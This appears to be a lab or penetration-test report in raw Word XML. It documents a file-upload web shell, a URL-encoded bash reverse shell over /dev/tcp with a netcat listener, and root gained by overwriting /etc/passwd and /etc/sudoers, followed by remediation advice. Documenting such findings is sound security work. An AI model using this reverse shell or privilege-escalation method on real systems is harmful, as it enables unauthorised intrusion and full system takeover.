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3D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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450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3D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23F5B5B3" w14:textId="55139C56" w:rsidR="00D43D23" w:rsidRDefault="00286F60">
            <w:r>
              <w:t>192.168.0.</w:t>
            </w:r>
            <w:r w:rsidR="00B40DB4">
              <w:t>138</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="0B2C395D" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B19551" w14:textId="77777777" w:rsidR="00D43D23" w:rsidRDefault="004E3F1D" w:rsidP="00643ABE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Unrestricted file upload → Web shell / Remote Code Execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BC7606" w14:textId="77777777" w:rsidR="00643ABE" w:rsidRDefault="00643ABE" w:rsidP="00643ABE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Remote command execution via uploaded script</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B59B2C7" w14:textId="651F8504" w:rsidR="00643ABE" w:rsidRDefault="00643ABE" w:rsidP="00643ABE">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Insecure privileged operation → ability to overwrite system file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="54E32C67" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AFA718E" w14:textId="5952F807" w:rsidR="00D43D23" w:rsidRDefault="00D33049" w:rsidP="00B40DB4">
            <w:r>
              <w:t xml:space="preserve">TCP </w:t>
            </w:r>
            <w:r w:rsidR="00B40DB4">
              <w:t>80</w:t>
            </w:r>
            <w:r w:rsidR="00D43D23">
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">http </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="01ACD642" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58604E68" w14:textId="75154DAF" w:rsidR="00D43D23" w:rsidRDefault="00B72058">
            <w:r>
              <w:t>7.4 high</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="0B2BF3BA" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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Attack Vetor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6212ED71" w14:textId="4E7B8E77" w:rsidR="00D43D23" w:rsidRDefault="00B72058">
            <w:r w:rsidRPr="00B72058">
              <w:t>CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="554B30B1" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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(PoC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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7F88D063" w:rsidR="00D43D23" w:rsidRDefault="00FE708C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE708C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EAF7215" wp14:editId="6BB85CE1">
                  <wp:extent cx="5239481" cy="108600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Nmap Scan to discover open ports and Services </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A86A63D" w14:textId="5CA9A8E2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B40DB4">
              <w:t xml:space="preserve"> 192.168.0.138</w:t>
            </w:r>
            <w:r w:rsidR="00614E08">
              <w:t xml:space="preserve"> –open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50556114" w14:textId="2DD23E40" w:rsidR="00B52CB8" w:rsidRDefault="00FE708C">
            <w:r w:rsidRPr="00FE708C">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75AAD79E" wp14:editId="361EB558">
                  <wp:extent cx="5731510" cy="1764030"/>
                  <wp:effectExtent l="0" t="0" r="254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6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5639C" w14:textId="2F4FB8AE" w:rsidR="00935EC7" w:rsidRDefault="00935EC7" w:rsidP="00935EC7"/>
          <w:p w14:paraId="278D1516" w14:textId="0E5475CD" w:rsidR="00935EC7" w:rsidRPr="00935EC7" w:rsidRDefault="00935EC7" w:rsidP="00935EC7">
            <w:r w:rsidRPr="00935EC7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17E85025" wp14:editId="791CDF8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236220</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5086350" cy="48450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52CB8" w:rsidRPr="00AA14CD">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>- By using WPScan we found an file upload page on the target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0506AE13" w14:textId="77777777" w:rsidR="00935EC7" w:rsidRDefault="00935EC7" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6749377D" w14:textId="705E21BF" w:rsidR="003315C5" w:rsidRDefault="003315C5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t>Step 4- Cr</w:t>
            </w:r>
            <w:r w:rsidR="00ED30C4">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>eate a web page for file upload using 36374.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C117FE8" w14:textId="2B9391C9" w:rsidR="003315C5" w:rsidRDefault="003315C5" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003315C5">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="574CA542" wp14:editId="326CBBA1">
                  <wp:extent cx="5731510" cy="116395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6E37C" w14:textId="77777777" w:rsidR="003315C5" w:rsidRDefault="003315C5" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A675C19" w14:textId="7BEB4511" w:rsidR="00325279" w:rsidRDefault="003315C5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lastRenderedPageBreak/>
              <w:t>Step 5</w:t>
            </w:r>
            <w:r w:rsidR="00325279">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> – we will create our own payload to upload.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BC58568" w14:textId="6566F26B" w:rsidR="003315C5" w:rsidRDefault="003315C5" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003315C5">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="396ECDE9" wp14:editId="6ADE31B8">
                  <wp:extent cx="3419952" cy="1600423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23E8C7" w14:textId="77777777" w:rsidR="00325279" w:rsidRDefault="00325279" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A452C8E" w14:textId="77777777" w:rsidR="00325279" w:rsidRDefault="00325279" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0AD0FAD1" w14:textId="7C0C6E78" w:rsidR="00935EC7" w:rsidRDefault="003315C5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t>Step 6</w:t>
            </w:r>
            <w:r w:rsidR="00935EC7">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00325279">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> We will use this vulnerability to upload and run payload.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="717E76BE" w14:textId="6C1231EA" w:rsidR="00325279" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5984">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1111C543" wp14:editId="71C95A80">
                  <wp:extent cx="4582164" cy="609685"/>
                  <wp:effectExtent l="0" t="0" r="889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1E56C" w14:textId="77777777" w:rsidR="00BC0B6F" w:rsidRDefault="00935EC7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t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1978AD0F" w14:textId="7EA0095D" w:rsidR="003D5984" w:rsidRDefault="003D5984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t>Step 7- Select the payload and upload it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C9436A2" w14:textId="5736A037" w:rsidR="003D5984" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5984">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65AD48E7" wp14:editId="43D2A77A">
                  <wp:extent cx="5731510" cy="2313940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2CE4D" w14:textId="77777777" w:rsidR="003D5984" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="036FB9D5" w14:textId="7038D0EE" w:rsidR="003D5984" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Step 8-upload the payload.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EB42F46" w14:textId="303FF8D0" w:rsidR="003D5984" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5984">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="213901AE" wp14:editId="230239F1">
                  <wp:extent cx="5731510" cy="1621155"/>
                  <wp:effectExtent l="0" t="0" r="254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1ED7" w14:textId="77777777" w:rsidR="003D5984" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4767455F" w14:textId="77777777" w:rsidR="003D5984" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66DC5B96" w14:textId="698A724E" w:rsidR="003D5984" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 9- You will see a new folder 2015.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F500900" w14:textId="22428A19" w:rsidR="003D5984" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D5984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6DB89AA0" wp14:editId="5E10D925">
                  <wp:extent cx="5731510" cy="1983740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8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91DFB" w14:textId="77777777" w:rsidR="003D5984" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="62BF2B92" w14:textId="77777777" w:rsidR="003D5984" w:rsidRDefault="003D5984" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 10-</w:t>
            </w:r>
            <w:r w:rsidR="00006418">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">We will try to open </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00006418">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>cmd.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00006418">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> to run the code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60848449" w14:textId="2A983A85" w:rsidR="00006418" w:rsidRDefault="00006418" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00006418">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1983F65D" wp14:editId="768F1DF5">
                  <wp:extent cx="5458587" cy="3410426"/>
                  <wp:effectExtent l="0" t="0" r="889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D277A" w14:textId="55D33913" w:rsidR="00006418" w:rsidRDefault="00006418" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Step 11-Now we can run script in the URL, before that run the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> for listening.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23416EF0" w14:textId="7F9C5F60" w:rsidR="00006418" w:rsidRDefault="00006418" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00006418">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D03E3FB" wp14:editId="094DE2A3">
                  <wp:extent cx="2648320" cy="16861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2190E" w14:textId="77777777" w:rsidR="00006418" w:rsidRDefault="00006418" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5061DFCA" w14:textId="20948A6B" w:rsidR="00006418" w:rsidRDefault="00006418" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 12-Now paste this enc</w:t>
            </w:r>
            <w:r w:rsidR="007B792C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>oded URL in front “?</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="007B792C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="007B792C">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>=”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> : ‘</w:t>
            </w:r>
            <w:r w:rsidR="006F7B4E" w:rsidRPr="006F7B4E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.0.138%2F9090%200%3E%261%27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A32C071" w14:textId="77777777" w:rsidR="006F7B4E" w:rsidRDefault="006F7B4E" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F7B4E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62AD4DB8" wp14:editId="2D8B75CB">
                  <wp:extent cx="5731510" cy="677545"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="82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D84C4" w14:textId="77777777" w:rsidR="006F7B4E" w:rsidRDefault="006F7B4E" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0766879F" w14:textId="77777777" w:rsidR="006F7B4E" w:rsidRDefault="006F7B4E" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Step 13- You will have a shell on the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21959912" w14:textId="77777777" w:rsidR="006F7B4E" w:rsidRDefault="006F7B4E" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F7B4E">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1058565D" wp14:editId="27F5F3C5">
                  <wp:extent cx="5731510" cy="1062990"/>
                  <wp:effectExtent l="0" t="0" r="254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E0C7A" w14:textId="77777777" w:rsidR="006F7B4E" w:rsidRDefault="006F7B4E" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="120BB71C" w14:textId="77777777" w:rsidR="006F7B4E" w:rsidRDefault="006F7B4E" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 14-</w:t>
            </w:r>
            <w:r w:rsidR="00E94003">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> We found that the copy command that the root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00E94003">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>previllage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00E94003">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F2F73F9" w14:textId="419C6B41" w:rsidR="00E94003" w:rsidRDefault="00E94003" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E94003">
              <w:rPr>
                <w:b/>
                <w:noProof/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28CB6465" wp14:editId="1DD750FB">
                  <wp:extent cx="5731510" cy="316928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9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824D" w14:textId="77777777" w:rsidR="00E94003" w:rsidRDefault="00E94003" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="206FC654" w14:textId="21867F57" w:rsidR="00E94003" w:rsidRDefault="00E94003" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E94003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7383D5E3" wp14:editId="67D63EA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171450</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5200650" cy="412750"/>
                  <wp:effectExtent l="0" t="0" r="0" b="635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>Step 15- we can use it to rewrite new users by replacing the /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>etc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passwd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B28DCF1" w14:textId="2AB5F50B" w:rsidR="00E94003" w:rsidRDefault="00E94003" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="794DB3A5" w14:textId="384BE083" w:rsidR="00E94003" w:rsidRDefault="00443051" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443051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7039B19A" wp14:editId="156C6D6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344170</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5200650" cy="728980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94003">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 16-</w:t>
            </w:r>
            <w:r w:rsidR="0066452D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remember we have to manually copy paste the content of the original file into a new file with same name because we can’t edit them.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1642255C" w14:textId="4EC009FC" w:rsidR="0066452D" w:rsidRDefault="0066452D" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="04F1D882" w14:textId="77777777" w:rsidR="00443051" w:rsidRDefault="00443051" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443051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64ACC606" wp14:editId="6DA1456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367030</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4895850" cy="666750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b/>
              </w:rPr>
              <w:t xml:space="preserve">Step 17- We don’t have the root access </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>yet</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>,also</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> has to overwrite “/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>etc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sudoers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>” in the same way.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FDD2D23" w14:textId="3C7F53B0" w:rsidR="00231B0A" w:rsidRDefault="001E304D" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001E304D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CE399C2" wp14:editId="4106CCA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173990</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5400675" cy="4445635"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="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44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231B0A">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Step 18- Now we can get root access by using our password.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43C9D360" w14:textId="3902D3AD" w:rsidR="00231B0A" w:rsidRDefault="00231B0A" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="381D40C9" w14:textId="13DB51C8" w:rsidR="00231B0A" w:rsidRPr="002A11E5" w:rsidRDefault="00231B0A" w:rsidP="00935EC7">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="57E49B2C" w14:textId="77777777" w:rsidTr="00D43D23">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="787D4A77" w14:textId="43197C7E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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EDB07B9" w14:textId="77777777" w:rsidR="004E3F1D" w:rsidRPr="004E3F1D" w:rsidRDefault="004E3F1D" w:rsidP="004E3F1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E3F1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Only</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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allow a very small set of safe file types (for example: images) and </w:t>
            </w:r>
            <w:r w:rsidRPr="004E3F1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verify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their actual content, not just the filename.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33C44B3B" w14:textId="77777777" w:rsidR="004E3F1D" w:rsidRPr="004E3F1D" w:rsidRDefault="004E3F1D" w:rsidP="004E3F1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E3F1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Store</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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uploaded files somewhere the website cannot run code from (put them outside the part of the site that executes scripts).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C86D633" w14:textId="77777777" w:rsidR="004E3F1D" w:rsidRPr="004E3F1D" w:rsidRDefault="004E3F1D" w:rsidP="004E3F1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E3F1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Rename</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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uploaded files and remove executable permissions so they cannot be executed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="799EB076" w14:textId="567B9667" w:rsidR="00D43D23" w:rsidRPr="004E3F1D" w:rsidRDefault="004E3F1D" w:rsidP="004E3F1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4E3F1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Require</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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users to be logged in before they can upload, and scan uploads for malware automatically.</w:t>
            </w:r>
            <w:r w:rsidRPr="004E3F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  <w:t>(These are standard fixes recommended by security experts.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D43D23" w14:paraId="205582D5" w14:textId="77777777" w:rsidTr="00D33049">
        <w:trPr>
          <w:trHeight w:val="958"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FD963EA" w14:textId="77777777" w:rsidR="00D909AF" w:rsidRPr="00D909AF" w:rsidRDefault="00D43D23" w:rsidP="00D909AF">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
